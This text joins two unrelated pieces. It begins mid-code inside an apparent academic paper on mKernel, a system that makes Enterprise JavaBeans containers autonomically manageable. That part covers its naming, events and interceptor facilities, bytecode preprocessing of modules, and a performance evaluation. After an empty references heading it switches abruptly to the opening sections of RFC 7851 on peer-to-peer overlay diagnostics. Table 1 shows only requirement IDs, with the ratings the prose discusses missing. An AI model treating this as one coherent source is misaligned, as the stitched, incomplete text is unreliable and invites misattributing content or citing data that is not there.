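        return null;                      // no target defined anywhere
    }
}
```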
**Deployment Information:** The *Deployment Information* facility is part of each module deployed in an autonomously manageable container. It provides information about the included enterprise beans. The information covers all relevant aspects of enterprise beans including, among others, interfaces, receptacles, and simple environment entries. Consequently, this facility delivers information about deployed components on type level. This also includes unique identifiers for each particular interface and concrete bean implementation. Consequently, it is possible to, e.g., identify all deployed implementations of a given interface to find candidates for a certain receptacle. If an error is identified inside one bean implementation, the affected components can easily be found. Because the deployment information is allocated inside the corresponding module, it is inherently up to date. On removal of a component, its part of the information about the overall structure is implicitly removed, too. With the Deployment Information facility, a sensor is provided which allows – in combination with the information covered within the Connector – structural inspection of the managed layer.
Events: This facility represents a broker for event producers and consumers. The event types provided for bean instances correspond to the lifecycle of beans as specified in the EJB-standard, namely the construction and destruction of all bean types, and additionally the passivation and activation of stateful session beans. Moreover, events for business calls on session bean instances and for message reception at message-driven bean instances can be captured. The occurrence of exceptions in all of these contexts is also supported via corresponding events. The information provided for each event includes aspects of the context of its occurrence, e.g. identifiers for the corresponding bean instances as well as for establishing a relation to the information of the Deployment Information facility. Additionally, for business calls, it is possible to deduce call chains spanning multiple bean instances, which also covers the identification of the invoked methods. The non-reentrancy property of enterprise beans, in combination with the prohibition of starting new threads, makes it possible to clearly identify dependencies among methods observed in the managed system. Local sequence numbers as well as information about the time and duration of an invocation are also included, which in combination allow an ordering of captured method invocations and an analysis of the fractions of the overall processing time of each call with respect to the different sub-calls, if any. Event consumers register at the Events service by providing identifiers for producers of events in combination with a set of event types they are interested in. Again – as discussed in the context of the Connector – a fine-grained specification of producers is possible on container-, module-, bean-, and instance level. As a result, a consumer receives a lease which it can renew on expiration if it is interested in obtaining the corresponding events further on.
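The lease handling sketched above can be captured in a few lines: per producer/event-type pair only the latest (largest) timeout needs to be kept, and a producer emits an event type only while some lease is still valid. The class and method names below are illustrative assumptions, not mKernel code.

```java
import java.util.HashMap;
import java.util.Map;

// Sketch of lease bookkeeping: for each producer/event-type pair only the
// latest lease timeout is stored, so the service never has to track
// individual consumers.
public class LeaseTable {
    private final Map<String, Long> latestTimeout = new HashMap<>();

    // Registration or renewal: keep only the maximum timeout per pair.
    public void register(String producer, String eventType, long timeoutMillis) {
        String key = producer + "#" + eventType;
        latestTimeout.merge(key, timeoutMillis, Math::max);
    }

    // A producer keeps emitting an event type while some lease is still valid.
    public boolean shouldProduce(String producer, String eventType, long now) {
        Long t = latestTimeout.get(producer + "#" + eventType);
        return t != null && t > now;
    }

    public static void main(String[] args) {
        LeaseTable leases = new LeaseTable();
        leases.register("m1/OrderBean", "BUSINESS_CALL", 1_000);
        leases.register("m1/OrderBean", "BUSINESS_CALL", 5_000); // renewal extends
        System.out.println(leases.shouldProduce("m1/OrderBean", "BUSINESS_CALL", 2_000));
        System.out.println(leases.shouldProduce("m1/OrderBean", "BUSINESS_CALL", 6_000));
    }
}
```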
Producers are instructed to throw events in two complementary ways. On each registration of a consumer and on lease expiration, the affected modules are identified and instructed to start or stop producing the corresponding events. In case a module is deployed, there might already exist matching registrations; on first invocation of a bean instance of the new module, the matching registrations are requested from the Events service for initialization. Afterwards, the module is considered during each subsequent registration of a consumer as well as on lease expiration. Events are distributed in two steps. Firstly, events are stored locally, which allows a fast continuation of the method call under consideration. Secondly, a stateless session bean, which is integrated into each managed module, checks in regular intervals whether there are any events to distribute. If so, these are published via the Java Message Service (JMS) [15] using a corresponding topic which is bound at a well-known name inside the namespace of a container. This allows the asynchronous distribution of events to multiple consumers. Consequently, the Events service itself does not need to keep track of the different consumers; for each producer-type-pair it is only necessary to store the latest lease-timeout. In summary, the Events facility provides a push-oriented sensor for making the runtime behavior of a managed system observable.
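The two-step distribution can be sketched as a local cache that is drained periodically by a distributor. In the sketch below, a plain list stands in for the JMS topic, and all names are invented for illustration.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Queue;
import java.util.concurrent.ConcurrentLinkedQueue;

// Minimal sketch of two-step event distribution: events are appended to a
// local cache on the calling thread, and a separate distributor drains the
// cache in intervals and publishes each batch.
public class EventPipeline {
    private final Queue<String> cache = new ConcurrentLinkedQueue<>();
    private final List<String> published = new ArrayList<>();

    // Step 1: cheap local store; the intercepted business call continues quickly.
    public void record(String event) {
        cache.add(event);
    }

    // Step 2: periodic drain, e.g. driven by a timer in the distributor bean.
    public int drain() {
        int n = 0;
        String e;
        while ((e = cache.poll()) != null) {
            published.add(e);   // stands in for publishing to the JMS topic
            n++;
        }
        return n;
    }

    public List<String> published() { return published; }

    public static void main(String[] args) {
        EventPipeline p = new EventPipeline();
        p.record("CONSTRUCTION:OrderBean#i1");
        p.record("BUSINESS_CALL:OrderBean#i1:placeOrder");
        System.out.println(p.drain());      // 2 events distributed
        System.out.println(p.drain());      // 0, cache already empty
    }
}
```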
Interceptors: The facilities discussed up to now provide sound effectors and sensors for the autonomic management of an EJB-based container. The Interceptors facility represents a generic opportunity to integrate additional aspects not already considered within mKernel. It allows the integration and removal of interceptors in a running component system. Again, the targets of interception can be controlled in a fine-grained way, as discussed for the Events facility. Via interceptors it is possible to intercept any method invocation upon enterprise bean instances, covering calls on interfaces as well as calls regarding state transitions during their lifecycle. In this context, it is possible to be informed about the occurrence of a specific method invocation, to gain insight into the parameters of the call, to manipulate those parameters, or even to prevent the call from being forwarded to its original target. The return from a method invocation can also be intercepted, which includes the opportunity to analyze and manipulate the return value. mKernel provides the opportunity to specify which of the different places of possible interception are of interest for a certain interceptor. It is, e.g., possible to only intercept business methods before they reach their original target, or to only intercept exceptions. Furthermore, context information for a method invocation is also provided, e.g. an identification of the caller, if known. The implementation was inspired by the Interceptors facility already designated as part of the EJB standard, but it provides a much higher degree of flexibility with respect to the built-in ability to re-configure the set of attached interceptors during runtime, which is not provided by the EJB standard. mKernel-interceptors are realized through session beans, which means that the provider of an interceptor has to implement a certain interface and deploy the implementation in form of a module.
Afterwards, the new interceptor must be registered at the Interceptors service. Interceptors are intended to be used temporarily, e.g. during re-configuration or as reaction to failures. It is also possible to attach interceptors to beans permanently, but it has to be kept in mind that each invocation of an mKernel-based interceptor implies the invocation of an additional session bean, which leads to a certain overhead. With the Interceptors facility, a combined sensor and effector is provided which allows fine-grained intervention into interactions on the managed layer.
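To make the interception options concrete, the hypothetical sketch below shows an interceptor that can either let a call pass or veto its forwarding and substitute a result. The interface shape is an assumption for illustration; real mKernel interceptors are session beans registered at the Interceptors service.

```java
// Hypothetical shape of an mKernel-style interceptor: it can observe a call,
// rewrite its parameters, or veto forwarding entirely.
public class InterceptionDemo {
    public interface Interceptor {
        // Return null to forward the (possibly modified) args, or a
        // replacement result to short-circuit the call.
        Object beforeCall(String method, Object[] args);
    }

    public static Object invoke(Interceptor ic, String method, Object[] args) {
        Object replaced = ic.beforeCall(method, args);
        if (replaced != null) return replaced;          // call vetoed
        return method + "(" + args[0] + ")";            // stand-in for the real bean
    }

    public static void main(String[] args) {
        Interceptor blockDeletes = (m, a) ->
            m.equals("delete") ? "BLOCKED" : null;
        System.out.println(invoke(blockDeletes, "read", new Object[]{"e1"}));
        System.out.println(invoke(blockDeletes, "delete", new Object[]{"e1"}));
    }
}
```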
Two of the facilities presented, namely Naming and Interceptors, can be seen as extensions of facilities already considered in the EJB standard. For those, serious limitations were identified which had to be overcome to make them usable in the context of runtime re-configuration. Consequently, they were taken as the foundation upon which the mKernel-specific facilities were realized. The Deployment Information facility is related to the view mKernel takes on a managed system and, because of the limitations identified, the standard was neither usable directly nor as a foundation. The other two facilities do not have any corresponding counterpart in the EJB standard itself or in related standards.
5. MANAGEABLE COMPONENTS
To make an EJB-module manageable, it has to be preprocessed by a tool that is part of mKernel. This tool accepts a standard-compliant Java Archive (JAR) containing an EJB-module ready for deployment, without any further configuration being necessary. The content of this module is manipulated and extended to make it autonomously manageable. Analysis, manipulations and extensions on bean level are performed using the Java Programming Assistant (Javassist) [7], which provides, amongst others, a very convenient API for analyzing and manipulating Java bytecode. The DD of the module is processed with the aid of the Java Architecture for XML Binding 2.0 (JAXB) [23]; JAXB is also used for the generation of a new DD covering manageable aspects. The steps performed upon a module by the tool are discussed in the following. For each enhancement performed, its particular contribution to mKernel is explained. Figure 2 presents an overview of the results of preprocessing a component. Additionally, it covers relations between integrated parts and the services discussed in section 4.
The first step during module preprocessing is the extraction of the submitted JAR. This is performed to keep the submitted module in its original state, so that it remains usable without mKernel. Secondly, all class files of the application are analyzed on bytecode level – especially the metadata annotations of the included beans – to collect information about the component regarding, e.g., provided beans and declared dependencies. From this information a representation is generated that contains all relevant details. Afterwards, the DD of the module is parsed and a representation is generated as well. By merging the two representations according to the demands of the EJB-standard, a comprehensive image of the inspected module is gained. All interfaces and receptacles are extended by enhancing all provided methods with an additional parameter used by mKernel for forwarding context information along call chains. The original methods continue to be provided to allow an external usage of the beans without even recognizing that they are managed by mKernel. The affected session beans are extended accordingly. Internally, the new method bodies solely consist of an invocation of the corresponding original methods. Therefore, the submission of context information is not even noticed by bean instances.
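The signature-extension step can be pictured as follows: for each business method, a generated overload carries the context parameter and simply delegates to the original method, so the bean's application logic never notices the extra parameter. The type and method names below are illustrative, not generated mKernel code.

```java
// Sketch of the interface extension step: each business method gets a sibling
// overload carrying context, whose body solely invokes the original method.
public class ContextExtensionSketch {
    public static class Context {
        public final String callChainId;
        public Context(String id) { callChainId = id; }
    }

    public static class OrderBean {
        // original business method, written by the application developer
        public String place(String item) { return "placed:" + item; }

        // generated overload: accepts context but simply delegates, so the
        // bean's application logic never sees the extra parameter
        public String place(String item, Context ctx) { return place(item); }
    }

    public static void main(String[] args) {
        OrderBean b = new OrderBean();
        System.out.println(b.place("book"));                      // external caller
        System.out.println(b.place("book", new Context("c42")));  // managed call chain
    }
}
```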
For all receptacles Wrappers are generated. These are used as replacement for connections to session beans during their creation. As shown in figure 2, all interaction among bean instances is performed through these wrappers, allowing the interception of the control flow. On invocation, wrappers contact the Connector which instructs them how to proceed. In case the connection should be switched, the Naming service is contacted for obtaining a new interaction endpoint. To prevent the establishment of connections that bypass mKernel, the usage of the container-provided naming facility is replaced with an alternative implementation without any effect on the container itself. This is done through integration of a Wrapped Context in combination with manipulating each part of the bytecode trying to open a connection to the naming facility of the container. This is redirected to the Connector and the Naming service of mKernel.
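The wrapper idea can be approximated in plain Java with a JDK dynamic proxy that re-reads its target on every call, which is what enables re-routing between invocations. Here the connector logic is reduced to a mutable array slot; everything else is an invented stand-in for illustration.

```java
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;

// Sketch of a receptacle wrapper using a JDK dynamic proxy: every invocation
// first consults the (here trivial) connector state, so connections can be
// re-routed between calls without the caller noticing.
public class WrapperSketch {
    public interface OrderService { String place(String item); }

    public static class Endpoint implements OrderService {
        private final String name;
        public Endpoint(String name) { this.name = name; }
        public String place(String item) { return name + ":" + item; }
    }

    // Builds a wrapper around a mutable target slot standing in for the Connector.
    public static OrderService wrap(final OrderService[] current) {
        InvocationHandler h = (proxy, method, args) ->
            method.invoke(current[0], args);   // re-read the current target per call
        return (OrderService) Proxy.newProxyInstance(
            WrapperSketch.class.getClassLoader(),
            new Class<?>[]{ OrderService.class }, h);
    }

    public static void main(String[] args) {
        OrderService[] current = { new Endpoint("primary") };
        OrderService wrapper = wrap(current);
        System.out.println(wrapper.place("book"));   // primary:book
        current[0] = new Endpoint("backup");         // connection re-routed
        System.out.println(wrapper.place("book"));   // backup:book
    }
}
```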
As part of the class-files the component is enhanced with, a Management Context is integrated. This class acts as configuration cache for the corresponding module and its constituting beans. Amongst others, it holds configuration information regarding aspects of the different services of mKernel, e.g. information about interceptors to re-route invocations to and directives for event types to throw as discussed in section 4. Configuration of a module is performed by the corresponding service via addressing the so-called Configuration Accesspoint which is realized as stateless session bean and integrated into each managed module. The context itself only caches this information and does not store it permanently. All information covered can be requested from the corresponding services at any given time.
Next, a so-called Referencer is configured and integrated into the module in process. It is an additional stateless session bean which provides references to session beans of the module. It is used by the Naming service of mKernel for being able to perform connection establishment. Afterwards, the partition of the Deployment Information service covering information about the component is configured appropriately. It is integrated as stateless session bean into the module.
To prohibit the direct injection of references during preparation of a bean instance, all dependency declarations are removed from the bytecode as well as from the DD of the module. In their place, an additional interceptor (Interceptor 1 in figure 2) is integrated as the first interceptor of the interceptor chain attached to any given bean. This interceptor imitates the dependency injection of the container by contacting the Connector and the Naming service, and injecting wrappers for all removed dependencies, if any. This is performed on intercepting a method call indicating that the usage phase of the lifecycle has started. Regarding the lifecycle of a bean instance in combination with the procedure prescribed for the container, the target instance still believes that it is in the dependency injection phase and consequently does not make use of references designated for dependency injection. After finishing the establishment of connections, the interceptor forwards the lifecycle call to the target instance. Through this procedure, there is no difference recognizable for the implementation of the affected beans.
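What Interceptor 1 does can be sketched with plain reflection: locate the receptacle fields whose declarations were stripped and inject wrapper stand-ins before the bean enters its usage phase. Discovering fields by type, and all names used here, are assumptions for illustration only.

```java
import java.lang.reflect.Field;

// Sketch of imitated dependency injection: find receptacle fields and inject
// wrapper stand-ins before the bean's usage phase begins.
public class InjectionSketch {
    public interface Dep { String ping(); }

    public static class SomeBean {
        private Dep dep;                  // receptacle whose @EJB declaration was stripped
        public String use() { return dep.ping(); }
    }

    public static void injectWrappers(Object bean) {
        try {
            for (Field f : bean.getClass().getDeclaredFields()) {
                if (Dep.class.isAssignableFrom(f.getType())) {
                    f.setAccessible(true);
                    f.set(bean, (Dep) () -> "wrapped");   // stand-in for a generated wrapper
                }
            }
        } catch (ReflectiveOperationException e) {
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        SomeBean bean = new SomeBean();
        injectWrappers(bean);            // imitates container injection
        System.out.println(bean.use()); // wrapped
    }
}
```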
To provide the mKernel-based interceptors with sufficient control over incoming method calls, another interceptor (Interceptor 2) is attached to each bean. This interceptor is inserted as the second one in the interceptor chain. As discussed above, the first one also belongs to mKernel and is only responsible for dependency injection. Consequently, no interceptor attached by a developer or deployer can gain access to the original method parameters or, in case the invocation should not be forwarded, even notices its occurrence. Established connections to interceptors are kept for future use. Consequently, it is easily possible to apply instance-specific interceptors via stateful session beans even for managed stateless session beans.
For tracking of events, a third interceptor is attached to each pre-processed bean (Interceptor 3). It requests directives to follow from the management context and stores the relevant events inside the Event Cache. For distribution of events, the Event Distributor is integrated into each managed module as stateless session bean. It checks the event cache in regular intervals for events to distribute and, if any, sends them as messages through a JMS-based Event Topic. At this topic interested event consumers can register for being informed about events. This is not covered in figure 2. The three dots following Interceptor 3 in figure 2 stand for the interceptors attached by developers or deployers. The call is transmitted to them afterwards.
During all of the processing steps, the image of the module is adjusted accordingly. Afterwards, it is translated into a corresponding DD and integrated into the target module. With the completion of the previous steps, all preparations of the target module are finished. Finally, the resulting module is packed into a JAR which is 100% compliant with the EJB standard. The integration of enhancements is transparent to the application logic of the beans inside and outside the module, i.e. their runtime behavior is not affected.
### 6. EVALUATION
This section addresses two aspects. Firstly, mKernel is evaluated against the requirements stated in section 2. Secondly, the results of a performance analysis are discussed.
With mKernel, the functionality required by a managed layer in the context of AC is provided. An evaluation against the requirements stated in section 2 is shown in table 1. The rating in the last column takes the possible values -1, 0 and +1. Here, -1 indicates that the corresponding requirement is not fulfilled by mKernel. A 0 is given in case the requirement is addressed and supported, but there is a demand for improvement. If the requirement is fulfilled completely, a +1 is given.
**Table 1: Functional evaluation of mKernel**

**Manageability Requirements (MR)**

| ID   |
|------|
| MR-1 |
| MR-2 |
| MR-3 |
| MR-4 |
| MR-5 |
| MR-6 |
| MR-7 |

**Platform Requirements (PR)**

| ID   |
|------|
| PR-1 |
| PR-2 |

**Development Requirements (DR)**

| ID   |
|------|
| DR-1 |
| DR-2 |
| DR-3 |
| DR-4 |
| DR-5 |
As shown in table 1, mKernel fulfills most of the requirements completely. Regarding MR-5, it has to be pointed out that the re-routing of existing connections is covered by the implementation, but no support for state transfer among connection targets is included. This was assumed to be application-specific and, hence, should be handled outside of mKernel. Identifiers are assigned to modules and bean instances. During interaction, context information regarding the control flow is also provided. This allows the tracing of interactions inside a managed container. Moreover, the Deployment Information service delivers rich information about deployed modules of a container. However, the underlying information model has some shortcomings and should be subject to revision. There is no facility provided by mKernel regarding tracking and provision of historical data, i.e., there is no logging facility. Altogether, this leads to a rating of 0 for MR-6. It has to be pointed out that this aspect does not comprise any unsolved technical issues; it is solely addressable via processing of data already provided by mKernel. The EJB-standard does not specify the deployment process of components itself, including the preparation of data sources for persistence, but leaves this open for vendor-specific solutions. Additionally, the design of the naming schema for the JNDI-implementation inside a container is not addressed by the standard; it is not even specified how a name can be assigned to a bean inside a container. Consequently, it is not possible to develop a management layer relying solely on the EJB-standard. For mKernel, the specifics of the GlassFish container were followed. In case a migration to different container implementations should be performed, these aspects must be addressed. Therefore, PR-2 was rated 0.
For evaluating the performance impact of applying mKernel in an EJB-container, two sample scenarios were used. Each of them was analyzed for stateful and stateless session beans. The first one shows the overhead for using the different facilities of mKernel without any side effects from application logic inside the module. For this, a simple session bean was taken, providing a single method without any parameters; the method delivers no return value and contains no application logic. The second scenario addresses the interaction with entities, because this is supposed to be the case for most EJB-based applications. In this scenario, a session bean is used for accessing a database through an interface providing methods for creating, reading and deleting a single entity consisting of a String value. An entity manager is obtained through dependency injection, and the entities are managed via container-managed persistence. Together, the scenarios should grant a first insight into how performance is influenced by mKernel for session beans. Each of the scenarios was analyzed through four settings to get an insight into the impact of the different facilities. As reference measurement, the module itself was deployed and executed without extensions and without any part of mKernel being installed in the container (base). The second setting (silent) takes an installation of mKernel without any of its facilities being equipped with directives, meaning that no consumers for events and no interceptors are registered. The two remaining settings address the Event- and the Interceptor service. Within the first one (event), the Event service is instructed to throw events for all business calls. For the second one (intercept), an interceptor is registered which internally does not have any application logic, because only the overhead for re-direction is of interest. It intercepts any incoming method call before it is processed by the target bean instance.
As hardware foundation for the evaluation runs, PCs were used, equipped with a 2.4 gigahertz Pentium IV processor with Hyper-Threading, 1 gigabyte of random access memory, and a 100 Megabit (MBit) ethernet card. As operating system, Windows XP was installed. The runs were performed in a 100-MBit local area network where all hosts were connected to the same switch. As application server, GlassFish v2 build 45 was chosen; the standard installation without any adjustments was taken as foundation. The client side of the scenarios was connected to the application server through the appclient tool being part of the build. For each scenario, a single client application performed a certain number of method invocations upon the target bean. After each single run, a new installation of the application server was prepared. It has to be pointed out that the evaluation performed should by no means be interpreted as a benchmark for the underlying configuration. In particular, the application server itself was not subject of any performance analysis. For measuring the overhead caused by the application of mKernel, the percentage overhead \( \text{overh}_s \) of each run with mKernel was calculated by setting the arithmetic mean runtime \( \bar{t}_s \) of each setting \( s \) in relation to the arithmetic mean runtime of the run without mKernel, \( \bar{t}_{\text{base}} \):
\[
\text{overh}_s = \left( \frac{\bar{t}_s}{\bar{t}_{\text{base}}} - 1 \right) \times 100\%
\]
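Assuming \( \bar{t}_s \) and \( \bar{t}_{\text{base}} \) are mean runtimes, the overhead calculation reduces to a one-liner: a run taking 1.75 times the base runtime yields an overhead of 75%, matching the style of values reported in table 2.

```java
// Sketch of the percentage-overhead calculation relating mean runtimes of a
// setting with mKernel to the mean runtime of the base run without mKernel.
public class Overhead {
    public static double overheadPercent(double meanScenario, double meanBase) {
        return (meanScenario / meanBase - 1.0) * 100.0;
    }

    public static void main(String[] args) {
        System.out.println(overheadPercent(175.0, 100.0)); // 75.0
        System.out.println(overheadPercent(100.0, 100.0)); // 0.0: no overhead
    }
}
```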
For the first scenario, the client of the stateless session beans performed 50000 subsequent method invocations. For the stateful session bean case, a connection to a bean instance was established; afterwards, five subsequent invocations were performed before connecting to a new instance. This was repeated 10000 times, again leading to 50000 observed invocations. For the second scenario, each client established a connection to a session bean for the stateless and stateful case. Afterwards, each type of method – create, read and delete – was invoked once. This was repeated 10000 times, leading to 30000 observations for each setting. Table 2 covers the results of the evaluation. Here, the ‘.’ in the percentage values is used as decimal separator.
**Table 2: Performance evaluation of mKernel**
**No application logic**

| \( s \)   | \( \text{overh}_s \) (stateless) | \( \text{overh}_s \) (stateful) |
|-----------|----------------------------------|---------------------------------|
| silent    | 4.343%                           | 1.581%                          |
| event     | 12.276%                          | 10.801%                         |
| intercept | 75.487%                          | 116.546%                        |

**Database access**

| \( s \)   | \( \text{overh}_s \) (stateless) | \( \text{overh}_s \) (stateful) |
|-----------|----------------------------------|---------------------------------|
| silent    | 0.942%                           | 0.408%                          |
| event     | 4.364%                           | 2.678%                          |
| intercept | 30.05%                           | 49.945%                         |
Summarizing, one can state that the overhead for the application of mKernel lies within acceptable boundaries. The results derived for the application of the Interceptor service can be explained by the fact that each invocation on an instance of a session bean is re-directed to a separate session bean instance, i.e. the interceptor. Additionally, for each instance of a session bean, a reference to each interceptor must be obtained on first invocation. This might have led to the results for the intercept-setting in combination with stateful session beans. It has to be pointed out that the different number of subsequent invocations for the two scenarios also had an important influence on the results. For the first scenario, each fifth invocation led to a connection establishment for stateful session beans while this was the case for each third invocation for the second scenario.
7. CONCLUSION AND FUTURE WORK
In summary, the implementation of mKernel showed that the EJB-standard provides a sound foundation for extensions making it autonomously manageable. However, because of the shortcomings found in the standard, it is not feasible to provide an implementation relying solely on it; instead, it is necessary to resort to container-specific solutions. All required aspects of manageability are realizable to a high degree. Additionally, the results of the performance evaluation showed that the overhead of integrating manageability into an EJB-container is justifiable. In this context, mKernel provides a domain-specific manageable layer for EA on top of a broadly accepted standard.
However, the evaluation revealed different areas of possible extensions for mKernel. At the time of writing, a comprehensive API is under development; it should replace the need to interact with the facilities directly for management purposes. Currently, the manageability spans those components deployed into the administrated container. It would be desirable to expand manageability with options for manipulating the collection of deployed components itself; at the moment, an additional facility for mKernel based on [11] is being realized. Additionally, it is being considered to what extent application-specific configuration of components can be supported during runtime. As a first idea, the manipulation of simple environment entries is planned, similar to the way dependencies are treated by mKernel already. Finally, it is planned to develop broader sample applications to evaluate and show the potential of mKernel for different application areas.
8. REFERENCES
Peer-to-Peer (P2P) Overlay Diagnostics
Abstract
This document describes mechanisms for Peer-to-Peer (P2P) overlay diagnostics. It defines extensions to the REsource LOcation And Discovery (RELOAD) base protocol to collect diagnostic information and details the protocol specifications for these extensions. Useful diagnostic information for connection and node status monitoring is also defined. The document also describes the usage scenarios and provides examples of how these methods are used to perform diagnostics.
Status of This Memo
This is an Internet Standards Track document.
This document is a product of the Internet Engineering Task Force (IETF). It represents the consensus of the IETF community. It has received public review and has been approved for publication by the Internet Engineering Steering Group (IESG). Further information on Internet Standards is available in Section 2 of RFC 5741.
Information about the current status of this document, any errata, and how to provide feedback on it may be obtained at http://www.rfc-editor.org/info/rfc7851.
# Table of Contents
1. Introduction
2. Terminology
3. Diagnostic Scenarios
4. Data Collection Mechanisms
   4.1. Overview of Operations
   4.2. "Ping-like" Behavior: Extending Ping
        4.2.1. RELOAD Request Extension: Ping
   4.3. "Traceroute-like" Behavior: The PathTrack Method
        4.3.1. New RELOAD Request: PathTrack
   4.4. Error Code Extensions
5. Diagnostic Data Structures
   5.1. DiagnosticsRequest Data Structure
   5.2. DiagnosticsResponse Data Structure
   5.3. dMFlags and Diagnostic Kind ID Types
6. Message Processing
   6.1. Message Creation and Transmission
   6.3. Message Response Creation
   6.4. Interpreting Results
7. Authorization through Overlay Configuration
8. Security Considerations
9. IANA Considerations
   9.1. Diagnostics Flag
   9.2. Diagnostic Kind ID
   9.3. Message Codes
   9.4. Error Code
   9.5. Message Extension
   9.6. XML Name Space Registration
10. References
    10.1. Normative References
    10.2. Informative References
Appendix A. Examples
   A.1. Example 1
   A.2. Example 2
   A.3. Example 3
Appendix B. Problems with Generating Multiple Responses on Path
Acknowledgments
Authors’ Addresses
1. Introduction
In the last few years, overlay networks have rapidly evolved and emerged as a promising platform for deployment of new applications and services in the Internet. One of the reasons overlay networks are seen as an excellent platform for large-scale distributed systems is their resilience in the presence of failures. This resilience has three aspects: data replication, routing recovery, and static resilience. Routing recovery algorithms are used to repopulate the routing table with live nodes when failures are detected. Static resilience measures the extent to which an overlay can route around failures even before the recovery algorithm repairs the routing table. Both routing recovery and static resilience rely on accurate and timely detection of failures.
There are a number of situations in which some nodes in a Peer-to-Peer (P2P) overlay may malfunction or behave badly. For example, these nodes may be disabled, congested, or may be misrouting messages. The impact of these malfunctions on the overlay network may be a degradation of quality of service provided collectively by the peers in the overlay network or an interruption of the overlay services. It is desirable to identify malfunctioning or badly behaving peers through diagnostic tools and exclude or reject them from the P2P system. Node failures may also be caused by failures of underlying layers. For example, recovery from an incorrect overlay topology may be slow when the speed at which IP routing recovers after link failures is very slow. Moreover, if a backbone link fails and the failover is slow, the network may be partitioned, leading to partitions of overlay topologies and inconsistent routing results between different partitioned components.
Some keep-alive algorithms based on periodic probe and acknowledge mechanisms enable accurate and timely detection of failures of one node’s neighbors [Overlay-Failure-Detection], but these algorithms by themselves can only detect the disabled neighbors using the periodic method. This may not be sufficient for the service provider operating the overlay network.
A P2P overlay diagnostic framework supporting periodic and on-demand methods for detecting node failures and network failures is desirable. This document describes a general P2P overlay diagnostic extension to the base protocol RELOAD [RFC6940] and is intended as a complement to keep-alive algorithms in the P2P overlay itself. Readers are advised to consult [P2PSIP-CONCEPTS] for further background on the problem domain.
2. Terminology
This document uses the concepts defined in RELOAD [RFC6940]. In addition, the following terms are used in the document:
- **overlay hop**: One overlay hop is one portion of path between the initiator node and the destination peer in a RELOAD overlay. Each time packets are passed to the next node in the RELOAD overlay, one overlay hop occurs.
- **underlay hop**: An underlay hop is one portion of the path between source and destination in the IP layer. Each time packets are passed to the next IP-layer device, an underlay hop occurs.
The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be interpreted as described in [RFC2119].
3. Diagnostic Scenarios
P2P systems are self-organizing, and ideally the setup and configuration of individual P2P nodes requires no network management in the traditional sense. However, users of an overlay as well as P2P service providers may contemplate usage scenarios where some monitoring and diagnostics are required. We present a simple connectivity test and some useful diagnostic information that may be used in such diagnostics.
The common usage scenarios for P2P diagnostics can be broadly categorized in three classes:
a. Automatic diagnostics built into the P2P overlay routing protocol. Nodes perform periodic checks of known neighbors and remove those nodes from the routing tables that fail to respond to connectivity checks [Handling_Churn_in_a_DHT]. Unresponsive nodes may only be temporarily disabled, for example, due to a local cryptographic processing overload, disk processing overload, or link overload. It is therefore useful to repeat the connectivity checks to see if nodes have recovered and can again be placed in the routing tables. This process is known as 'failed node recovery' and can be optimized as described in the paper "Handling Churn in a DHT" [Handling_Churn_in_a_DHT].
b. Diagnostics used by a particular node to follow up on an individual user complaint or failure. For example, a technical support staff member may use a desktop sharing application (with the permission of the user) to remotely determine the health of, and possible problems with, the malfunctioning node. Part of the remote diagnostics may consist of simple connectivity tests with other nodes in the P2P overlay and retrieval of statistics from nodes in the overlay. The simple connectivity tests are not dependent on the type of P2P overlay. Note that other tests may be required as well, including checking the health and performance of the user’s computer or mobile device and checking the bandwidth of the link connecting the user to the Internet.
c. P2P system-wide diagnostics used to check the overall health of the P2P overlay network. These include checking the consumption of network bandwidth, checking for the presence of problem links, and checking for abusive or malicious nodes. This is not a trivial problem; it has been studied in detail for content and streaming P2P overlays [Diagnostic_Framework] but has not been addressed in earlier documents. While this is a difficult problem, a great deal of information that can help in diagnosing these problems can be obtained by collecting basic diagnostic information for peers and the network. This document provides a framework for obtaining this information.
4. Data Collection Mechanisms
4.1. Overview of Operations
The diagnostic mechanisms described in this document are primarily intended to detect and locate failures and to monitor performance in P2P overlay networks. They provide mechanisms to detect and locate malfunctioning or badly behaving nodes, including disabled nodes, congested nodes, and misrouting peers; a mechanism to check direct connectivity or connectivity to a specified node; a mechanism to check the availability of specified resource records; and a mechanism to discover failures in the P2P overlay topology and the underlying network topology.
The RELOAD diagnostics extensions define two mechanisms to collect data. The first is an extension to the RELOAD Ping mechanism that allows diagnostic data to be queried from a node as well as to diagnose the path to that node. The second is a new method, PathTrack, for collecting diagnostic information iteratively. Payloads for these mechanisms allowing diagnostic data to be collected and represented are presented, and additional error codes are introduced. Essentially, this document reuses the RELOAD specification [RFC6940] and extends it to introduce the new
diagnostics methods. The extensions strictly follow how RELOAD specifies message routing, transport, NAT traversal, and other RELOAD protocol features.
This document primarily describes how to detect and locate failures including disabled nodes, congested nodes, misrouting behaviors, and underlying network faults in P2P overlay networks through a simple and efficient mechanism. This mechanism is modeled after the ping/traceroute paradigm: ping [RFC792] is used for connectivity checks, and traceroute is used for hop-by-hop fault localization as well as path tracing. This document specifies a "ping-like" mode (by extending the RELOAD Ping method to gather diagnostics) and a "traceroute-like" mode (by defining the new PathTrack method) for diagnosing P2P overlay networks.
One way these tools can be used is to detect the connectivity to the specified node or the availability of the specified resource record through the extended Ping operation. Once the overlay network receives some alarms about overlay service degradation or interruption, a Ping is sent. If the Ping fails, one can then send a PathTrack to determine where the fault lies.
The diagnostic information can only be provided to authorized nodes. Some diagnostic information can be provided to all the participants in the P2P overlay, and some other diagnostic information can only be provided to the nodes authorized by the local or overlay policy. The authorization depends on the type of the diagnostic information and the administrative considerations and is application specific.
This document considers the general administrative scenario based on diagnostic Kind, where a whole overlay can authorize a certain kind of diagnostic information to a small list of particular nodes (e.g., administrative nodes). That means if a node gets the authorization to access a diagnostic Kind, it can access that information from all nodes in the overlay network. It leaves the scenario where a particular node authorizes its diagnostic information to a particular list of nodes out of scope. This could be achieved by extension of this document if there is a requirement in the near future. The default policy or access rule for a type of diagnostic information is "deny" unless specified in the diagnostics extension document. As the RELOAD protocol already requires that each message carries the message signature of the sender, the receiver of the diagnostics requests can use the signature to identify the sender. It can then use the overlay configuration file with this signature to determine which types of diagnostic information that node is authorized for.
In the remainder of this section we define mechanisms for collecting data, as well as the specific protocol extensions (message extensions, new methods, and error codes) required to collect this information. In Section 5 we discuss the format of the data collected, and in Section 6 we discuss detailed message processing.
